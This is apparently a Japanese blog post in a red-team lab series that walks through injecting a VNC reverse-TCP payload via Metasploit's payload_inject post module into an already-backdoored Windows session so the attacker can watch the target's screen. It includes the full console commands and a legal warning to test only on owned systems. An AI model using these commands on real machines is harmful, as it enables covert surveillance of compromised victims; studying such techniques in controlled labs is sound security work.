とある親父の侵入実験【Empire:帝国の目?鷹の目?】
今回は、とあるシナリオに基づいて実施します。
ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。
「レッドチームとしては、なんとしてもブルーチームの操作画面を覗き見たい!これまで利用した標的型攻撃で得たブルーチームとのバックドアを利用して画面を盗み出せ!」
という命令が出たのでやってみます。
途中までの手順に関しては前々回の「皇帝との共闘」と一緒なんで、その後から書きます。
監視モジュール準備
現在接続されているセッションにVNCモジュールを送り込んでやる。
msf exploit(handler) > use post/windows/manage/payload_inject
msf post(payload_inject) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf post(payload_inject) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf post(payload_inject) > set session 1
session => 1
msf post(payload_inject) > set handler true
handler => true
準備ができたら実行
msf post(payload_inject) > exploit
色々と流れると・・・
こんな感じに標的PCとの間にVNCで接続することができる。
相手との間の回線速度にもよるけど、案外快適に盗み見することが可能になりますw
「これで、ブルーチームの動向を確認することができる!」